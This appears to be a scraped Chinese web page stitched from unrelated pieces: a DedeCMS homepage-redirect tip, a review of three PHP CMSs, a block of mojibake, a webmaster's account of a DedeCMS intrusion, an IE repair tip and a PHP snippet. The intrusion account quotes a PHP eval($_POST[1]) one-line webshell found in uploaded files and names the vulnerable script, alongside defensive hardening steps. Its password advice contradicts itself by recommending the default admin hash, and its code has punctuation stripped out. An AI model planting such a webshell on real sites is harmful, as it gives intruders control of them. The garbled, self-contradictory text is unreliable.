dedecms的漏洞:Dedecms的隐患如何预防风险

　　关于dedecms织梦程序首页如何去除indexhtml有以下三种解决方法

　　一、静态访问也分3种解决方法

　　1、IIS

　　打开IIS点击文档，里面将indexhtml置于indexphp上面，这有什么作用呢其实这样设置就是在网站同时有indexphp和indexhtml的情况下，先访问index,html这样就不会出现跳转的情况

　　2、Apache

　　apache里面DirectoryIndex来控制文件检索优先级的

　　DirectoryIndex indexhtml indexphp indexhtm

　　和iis一样，将indexhtml往前放

　　3、虚拟主机

　　把网站默认首页indexhtml放到indexphp前面，这样它自动读到indexhtml就不会跳转了

　　二、直接动态浏览

　　网站动态访问的情况下，程序会删除根目录下面的Indexhtml

，那么会执行include(dirname(__FILE__)。‘/indexhtml’);这段代码，把首页引用而非跳转。

　　三、把dedecms的indexphp更为以下内容

　　GetOne("Select From `#@__homepageset`"); $row['templet'] =

MfTemplet($row['templet']); $pv = new PartView();

$pv->SetTemplet($cfg_basedir $cfg_templets_dir "/" $row['templet']);

$pv->SaveToHtml(dirname(__FILE__)'/indexhtml');

include(dirname(__FILE__)'/indexhtml'); exit(); >

　　//自动生成HTML版

　　require_once (dirname(__FILE__) "/include/commonincphp");

　　require_once DEDEINC"/arcpartviewclassphp";

　　$GLOBALS['_arclistEnv'] = 'index';

　　$row = $dsql->GetOne("Select From `#@__homepageset`");

　　$row['templet'] = MfTemplet($row['templet']);

　　$pv = new PartView();

　　$pv->SetTemplet($cfg_basedir $cfg_templets_dir "/"

$row['templet']);

　　$pv->SaveToHtml(dirname(__FILE__)'/indexhtml');

　　include(dirname(__FILE__)'/indexhtml');

　　exit();

　　>

　　其实主要就是把那段301定向代码删除

　　header(‘HTTP/11 301 Moved Permanently’);

　　header(‘Location:indexhtml’);

大体试用了一下三个系统，得出了一个比较粗浅的结论：

1、phpcms：

phpcms自2007版本开源以后才开始引起广泛关注，但这次也是头一次研究。用了几天，有了一点初步的印象。（以下以2007版为例，2008版尚未正式推出）

粗看起来，phpcms 2007是三者中最为完善的，各项功能考虑的很细致，导致进了新手进了后台先要晕半天才行。各项功能，比如UNIX系统的权限、模版修改、广告、商城、信息、单网页。。。。都做的相当的完备了。

发表文章的关键字、作者、来源、自动远程保存等等，都做的不错。但是，phpcms发表文章的摘要，似乎是只能自动截取，不能手工设置，灵活性欠佳。

发表的文章可以通过关键字来索引相关贴，做的不错。

支持通行证方式进行论坛和其它系统的整合，可以进行正向和反向两种方式的整合。但是文档说的不太清楚，研究了半天才成功。但是反向整合pw501登录后自动跳转不回来。

phpcms 2007的后台安排的太琐碎，看的头晕。发一篇文章也要晕半个钟头，而且首页的更新莫不清规律，幻灯片老半天不更新。

phcms尽管功能很强大，但是却缺少一样重要的东西：可视化的模版工具，这也是php168和dedecms共同的缺点。在这方面，他们甚至不如刚刚起步的DiyPage好，DiyPage只是一个刚刚具备了雏形的CMS系统，却拥有一个很方便的后台可视化界面设计工具，即使是菜鸟也可以轻松设计界面（虽然灵活性没那么强大，但是足够你用了）。

phpcms 2007整体以频道为依据进行组织，即使你不想用频道，哪也得用，这个已经由不了你了 。所以如果仅仅是一个比较简单的网站，也用上一个频道，看起来够别扭的，这是phpcms 2007最大的缺点，不过看了phpcms 2008beta2发现，phpcms终于解除了这个垃圾限制。

发现phpcms的广告功能似乎不完善，一个广告位定义了两个广告，不能自动轮换，总是显示第一个。

phpcms虽然实现了模块化，但是不管你用不用，一大堆模块稀里呼噜就装上了，看起来很不爽，也不直观。

phpcms虽然是很早就是商业化运作的软件，然后开发效率却是不高，新版本屡屡跳票，影响了它的产品形象，让开源以来积累的人气和一些拥趸大失所望。然而最近贴上了六间房以后，资金应该是没有压力了，新版本也开始浮出水面，2008beta1已经发布了，可惜问题多多。

phpcms 2008 beta2 在 MySQL4 上还是有使用问题，不过比beta1强一些，beta1直接就安装不了，不知道正式版是否会正式放弃MySQL4。

phpcms 2008beta2看上去不错，新功能令人振奋的，界面清爽。以前一团乱麻的后台界面已经打扫干净了。phpcms 2008的标签采用了中英文混合的方式，对菜鸟来说更加容易上手，比较新颖。另外，beta2好像是实现了类似php168的可视化模版中的标签设置方式，虽然不是可视化的设计模版，总归可以自定义一些元素样式了。不过这个beta2版也还是顶多算是个预览版，BUG极多，功能不全。如果准备用phpcms的话，怕是还要大大的等几天才行。

另外，phpcms官方论坛对免费版的支持很不到位，伤了很多粉丝的心。

2、dedecms

51应该是dedecms正式商业化运作以后推出的第一个版本吧？以前的dedecms个体作坊式的发展，由于作者兼职时间和精力不足，导致发展缓慢，新版本频频跳票，引起广大粉丝的强烈不满，甚至导致柏拉图和dedecms用家之间的语言冲突。然而dedecms在商业化运作以后，新版本的发布周期大大缩短，产品功能不断改进，界面美化了很多，人气和用户数量大大增长了，现在看发展势头不错。

dedecms的根目录是最简单的，只有几个文件，比以上两个都强多了，其实这样不仅看起来清爽，维护起来也方便，值得表扬

dedecms的频道非常费解，看起来只有频道模型，要增加频道就要添加模版文件有点费解，仔细研究发现，这个dedecms其实和php168的方式差不多，任何栏目都可以添加子目录，绑定域名，其实就和频道是一个意思，栏目和频道可以互相转换。

dedecms的通行证只支持反向整合，就是dedecms可以用服务端的用户数据登录。其实所谓整合，一般也就是这样的。论坛用整站用户数据的情况恐怕极为少见，对论坛管理也不利。

但是dedecms的通行证整合，需要修改论坛文件，不明白为啥要这样，是因为论坛的通行证功能还不完善吗？

dedecms的广告管理用起来比较麻烦，要先定义标签，然后手工在模板中插入。好像模版上没预定义好广告位置，实在是太不应该了。。。。相当于手动操作，不符合当今历史潮流啊。而且大家常用的广告自动轮换功能，也没有实现。

试用发现，dedecms有时还有一些小毛病，比如远程附件功能，有时发现无法自动转存到本地。另外，在模块数量上，dedecms也无法和php168和phpcms相比，只有文章、下载、、Flash等基本的功能，不知道dedecms 2007发布以后能否有所改观

dedecms的相关文章、热点文章等功能，用了静态生成的方式直接写入到了HTML文件中，这样在生成HTML后，无法自动更新，需要经常手工重新生成全部HTML才能更新相关文档和热点文档。但是大量的重复生成所有HTML文件效率太低下了，这方面dedecms不如php168最新添加的相关文章功能，是用JS方式实现的，不需要更新HTML就能自动索取最新的相关文章。但是使用JS方式也存在服务器效率的问题。

dedecms的首页、列表页、还有文章页都使用了单独的模板，没有使用header和footer模板，这样的好处是可以产生各种风格的页面（允许首页、列表页、内容页使用不同的风格），但是缺点是修改添加头部和底部广告、导航条的时候，相当费劲，要一个一个模板的修改。而且dedecms的版权声明字段设置太小，只有250字节，写不进去多少内容，顶多能添加个计数器就不错了。

dedecms起步就用了类似XML标签方式，而且官方还提供了Dreamweaver的插件来识别标签，应该说在国内是比较独到的。但是这种方式也需要新手一定的时间才能适应。同时，dedecms一直缺乏比较完善的文档，也进一步加大了菜鸟上手的难度。

dedecms最大的问题就是没有提供类似Diypage的可视化设计方式，因为标签比较难于上手，对新手来说做模板是很头疼的问题。

dedecms 51比40功能有了很多进步，增加DIGG功能，还有类似分类信息之类的功能都实现了。不过也有退步，比如关键词、相关帖功能都严重退步了，发帖也很不方便，而且dedecms在商业版本和免费版本之间做功能和代码区分，也自然会在免费版本上有所缩水。

dedecms商业化发展以后，目前出现的问题是免费版的技术支持做的不太到位，比phpcms强不了多少。

3、php168

php168关注很久了，却一直没怎么用过。当年整合论坛的30版给俺很深的印象，可惜论坛没有坚持下去。最近php168的开发工作很强劲，推出了N多模块，让人看的眼晕。

看过了phpcms的后台，再进php168的后台，感觉舒服多了，简洁多了，但是功能还可以。

php168的频道不是强制的，好像是栏目和频道可以转换，灵活性比phpcms强多了

关键字功能没有实现相关贴功能，不爽（新版本已经增加了，用JS方式实现的动态调用）。

php168一直不是用通行证实现整合论坛，这方面做的不好，灵活性欠佳。需要CMS和论坛安装在同一个数据库才行。

首页的标签设置，php168提供了一个可视化的工具，可以直接在上面设置标签，修改标签属性，这方面做的比phpcms强多了。虽然不能设计主页模板，但是可以方便的修改首页模板中元素的内容和显示方式，对菜鸟来说比较不错。dedecms的标签提供（或者公布）的属性比较少，想定制样式是比较麻烦的，目前可能是需要直接用PHP语句来修改。

但是要实现广告功能，还是要像dedecms一样，先定义标签，然后手工修改模版，有点太麻烦了，汗。另外，好像也没实现广告自动轮换功能（）。

php168实现了模块化，可以一个一个的装，看起来比phpcms清爽多了

php168页面模板也是使用了标签方式，但是模板代码好像是类似phpwind的方式（这不奇怪，php168的作者本来就是从phpwind插件开发开始的），代码和模板的分离程度比较差，这个东西其实是个双刃剑，因为用php代码方式，灵活度是最大的，也不用像dedecms一样，标签难以上手，扩展困难；但是缺点也很大，就是不懂编程的人士难以上手，特别是美工和程序的分离不彻底（php168的官方模版就不如dedecms漂亮，不知道是不是这个原因）。

php168比dedecms多了一个可视化的首页标签定制功能，能设置首页元素的显示内容，显示方式，这是比dedecms略强了一些，有总比没有强啊。

因为php168研究的比较少，其它功能没仔细测试过，就不多讲了。总体来说，如果php168能稍加完善，其实是一个相当不错的整站程序。

�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms，主要得益于两大站长网的鼎力支持；不过，人火是非多，cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms，前段时间又一次受到攻击，攻击的目的很简单，那么便是黑链，知道后稍微修改下代码就恢复了，不是很严重；这段时间网站又被莫名上传文件，类似前一次，虽然对方还没来得及修改网站模板，不过这说明网站安全防患还未到位，对方任何时候都可能再次取得管理员权限，所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底，所以就去网上找了一下相关的资料，发现这确实是dedecms的漏洞，黑客可以利用多维的变量绕过正则检测，漏洞主要发生在/plus/mytag_jsphp中，原理便是准备一个MySQL数据库来攻击已知网站的数据库，通过向数据库中写入一句话的代码，只要成功写入，那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看，黑客写入的文件主要存在于/plus/文件夹下，目前已知的几个文件包括gaphp、logphp、bphp、b1php等，文件的特征便是短小，内容很少，可能写入的时候不是很方便，不过这些代码的作用确实不小的。下面这是gaphp文件中的部分代码：<title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])>实际的代码比上面截取的要长，不过都是这段代码的重复，至于logphp的代码，同这个类似，只有一句话，简单明了，如果你对网络安全稍有了解，那么会知道<php eval($_POST[1]);>是php一句话木马，使用部分指定的工具可以执行这段代码，预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞，同时知道对方利用什么样的原理来利用漏洞，那么要怎么预防这些危险的事发生呢？经过查询大量的资料，我初步整理出下面这些预防漏洞被利用的步骤，希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法，不管你使用的是什么版本的dedecms，都要及时在后台升级版本自动更新补丁，这是避免漏洞被利用的最重要的一步；同时官方还提供设置目录的方法，主要是设置data、templets、uploads、a为可读写不可执行权限；include、member、plus、后台管理目录等设置为可执行可读不可写入权限；删除install及special目录，具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号，随后推测密码来破解的，所以修改默认的admin账号非常重要，至于如何修改，方法很多，比较有效的是用phpadmin登陆网站数据库，找到dede_admin数据库表（dede是数据库表前缀），修改其中userid及pwd两项，其中密码一定要修改成f297a57a5a743894a0e4，这是默认的密码admin；修改后去后台登陆，登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节，同样要注意，尽量别选择太廉价的空间，太廉价的空间很容易出现服务器本身的安全问题，只要服务器出现问题，整个服务器下面的网站都没救了。还有便是，如果没必要，尽量别开通会员注册什么的，使用起来很麻烦；至于网站后台目录，不要写到robotstxt里面，同时每个月至少换一次，管理员密码什么的同样要更换，避免和别的账号密码相同被推测出来。

网页上有错误解决办法

手动修复办法：

1、点击“开始”菜单，打开“运行”。

2、输入regsvr32 jscriptdll后选择“确定”。 出现提示（jscriptdll中的DIIRegisterServer成功）后，点击“确定”。

3、再次输入regsvr32 vbscriptdll选择“确定”。 再一次出现提示（vbscriptdll中的DIIRegisterServer成功）后，点“确定”。 经过以上两次成功提示，说明已成功修复IE组件。

4、将浏览器的过滤等功能关闭后，清除一下浏览器的缓存（工具->Internet选项->（在Internet 临时文件框中-删除Cookies），再点Internet 临时文件框中删除文件（记得勾上删除所有脱机内容），确定后，然后再重新打开浏览器尝试！

软件修复办法：

1下载免费杀毒软件 金山毒霸2011

2选择系统清理选项，点击立即清理

3选择安全百宝箱中系统修复，即可解决网页上有错误解问题

用strrchr这个PHP自带的函数，就是从后面取字符串。然后用substr把逗号去掉，就可以了。

$str=substr(strrchr($string,','),1);